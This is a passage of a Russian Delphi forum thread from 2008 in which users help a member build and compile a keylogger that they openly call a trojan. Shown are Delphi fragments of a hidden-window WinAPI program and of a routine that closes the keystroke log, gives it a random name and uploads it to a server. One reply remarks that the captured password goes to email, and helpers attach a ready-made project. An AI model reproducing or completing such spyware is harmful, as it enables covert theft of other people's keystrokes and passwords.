Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Delphi программирование > Общие вопросы Delphi
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 01.04.2008, 17:22   #31
dimonbest
Форумчанин
 
Регистрация: 07.02.2008
Сообщений: 150
По умолчанию

Код:
  randomize;   
  i:=random(1234567);   
  wClass:=WndClass1(hInstance,0,0,0,0,0,COLOR_BTNFACE,'MYCLASS','',@WndMessageProc);   
  RegisterClass(wClass);   
  hApp:=CreateWindow(wClass.lpszClassName, '',0,   
  Integer(CW_USEDEFAULT), Integer(CW_USEDEFAULT),   
  0, 0, 0, 0, hInstance, nil);   
  if hApp=0 then  
  begin  
   UnregisterClass('MYCLASS',hInstance);   
   halt(0);   
  end;   
  loopWindow(wMsg);
Это основной цикл программы?
Не могу еще найти место в программе, где непосредственно происходит
запись в файл...
А зачем в форму? А ее можно сделать невидимой
dimonbest вне форума Ответить с цитированием
Старый 01.04.2008, 17:39   #32
Dj_smart
Капсула от спама
Форумчанин
 
Аватар для Dj_smart
 
Регистрация: 04.03.2008
Сообщений: 779
По умолчанию

Цитата:
Это основной цикл программы?
Да, это основно цикл.
Цитата:
Не могу еще найти место в программе, где непосредственно происходит
запись в файл...
Поищи повнимательнее...Найди такой код:
Код:
CloseFile(fn); // Закрыли старый файл
a1:=strtopchar(io); //Узнали случайное имя для отправки на сервак
//(вероятность вроде 1 до 1234567 что файлы совпадут) Это чтобы если твой троян сильно наплодится, 
//хотя он этого пока не умеет делать,чтобы файлы не совпали :)
upload(a1,a1); //отправили на сервак
AssignFile(fn,GetName); 
ReWrite(fn); // Забецали новый файл
Ок?
Если данный ответ не столь конкретен, как Вы желаете его увидеть, возможно необходимо поразмыслить, стоит ли вопрос того, чтобы о нём спрашивать на форуме?
CncFiles.ru - бесплатный файловый хостинг
Dj_smart вне форума Ответить с цитированием
Старый 01.04.2008, 18:09   #33
dimonbest
Форумчанин
 
Регистрация: 07.02.2008
Сообщений: 150
По умолчанию

ок, разбираюсь, спасибо....
dimonbest вне форума Ответить с цитированием
Старый 01.04.2008, 18:56   #34
dimonbest
Форумчанин
 
Регистрация: 07.02.2008
Сообщений: 150
По умолчанию

Можешь посмотреть, не компилиться проект во вложении...
Вложения
Тип файла: rar hookbest.rar (163.8 Кб, 15 просмотров)
dimonbest вне форума Ответить с цитированием
Старый 01.04.2008, 19:29   #35
НЕ_АЙС
Форумчанин
 
Регистрация: 18.04.2007
Сообщений: 135
По умолчанию

И никогда не скомпилится. Научись отличать VCL проект от WinAPI.

Держи хакер юный
Вложения
Тип файла: rar Шпийон.rar (43.9 Кб, 37 просмотров)

Последний раз редактировалось НЕ_АЙС; 01.04.2008 в 19:37.
НЕ_АЙС вне форума Ответить с цитированием
Старый 02.04.2008, 10:34   #36
dimonbest
Форумчанин
 
Регистрация: 07.02.2008
Сообщений: 150
По умолчанию

Цитата:
Сообщение от НЕ_АЙС Посмотреть сообщение
И никогда не скомпилится. Научись отличать VCL проект от WinAPI.
Так а что надо сделать чтоб скомпилилось?
Кстати, в этом проекте русские буквы не понимает, пишет только английские...так и надо?
dimonbest вне форума Ответить с цитированием
Старый 02.04.2008, 16:27   #37
Dj_smart
Капсула от спама
Форумчанин
 
Аватар для Dj_smart
 
Регистрация: 04.03.2008
Сообщений: 779
По умолчанию

Тебе ж пароль всеравно на почту?
Значит так и надо
Если данный ответ не столь конкретен, как Вы желаете его увидеть, возможно необходимо поразмыслить, стоит ли вопрос того, чтобы о нём спрашивать на форуме?
CncFiles.ru - бесплатный файловый хостинг
Dj_smart вне форума Ответить с цитированием
Старый 02.04.2008, 18:28   #38
НЕ_АЙС
Форумчанин
 
Регистрация: 18.04.2007
Сообщений: 135
По умолчанию

Цитата:
Сообщение от dimonbest Посмотреть сообщение
Так а что надо сделать чтоб скомпилилось?
Кстати, в этом проекте русские буквы не понимает, пишет только английские...так и надо?
Я же добавил файл к своему сообщению, где уже готовый проект лежит.
Посмотри внимательнее.
НЕ_АЙС вне форума Ответить с цитированием
Старый 02.04.2008, 18:34   #39
dimonbest
Форумчанин
 
Регистрация: 07.02.2008
Сообщений: 150
По умолчанию

Цитата:
Сообщение от НЕ_АЙС Посмотреть сообщение
Я же добавил файл к своему сообщению, где уже готовый проект лежит.
Посмотри внимательнее.
Этоже вроде как тот же самый проект... Меня еще интересует как можно сделать это же, но на форме например...
dimonbest вне форума Ответить с цитированием
Старый 03.04.2008, 10:46   #40
dimonbest
Форумчанин
 
Регистрация: 07.02.2008
Сообщений: 150
По умолчанию

Цитата:
Сообщение от Dj_smart Посмотреть сообщение
Да, это основно цикл.
Если это основной цикл, то почему тогда у меня не завершается процесс, когда я создаю файл t.txt на диске С?
Код:
begin
  if FileExists('c:\t.txt') then halt ;
  randomize;
  i:=random(1234567);
  wClass:=WndClass1(hInstance,0,0,0,0,0,COLOR_BTNFACE,'MYCLASS','',@WndMessageProc);
  RegisterClass(wClass);
  hApp:=CreateWindow(wClass.lpszClassName, '',0,
  Integer(CW_USEDEFAULT), Integer(CW_USEDEFAULT),
  0, 0, 0, 0, hInstance, nil);
  if hApp=0 then
  begin
   UnregisterClass('MYCLASS',hInstance);
   halt(0);
  end;
  loopWindow(wMsg);
end.
dimonbest вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Имитация нажатия клавиш Air Свободное общение 28 04.02.2010 12:38
Требуется написать программу которая переводит файл из одного вида в другой sarudan Помощь студентам 1 11.09.2008 16:17
Эмуляция нажатия нескольких клавиш -=Shad0www Общие вопросы Delphi 3 12.05.2008 08:13
Имитация нажатия комбинации клавиш Zeraim Win Api 15 05.05.2008 20:35
программа по эмуляции нажатия клавиш sr_lexx Win Api 3 03.12.2007 15:40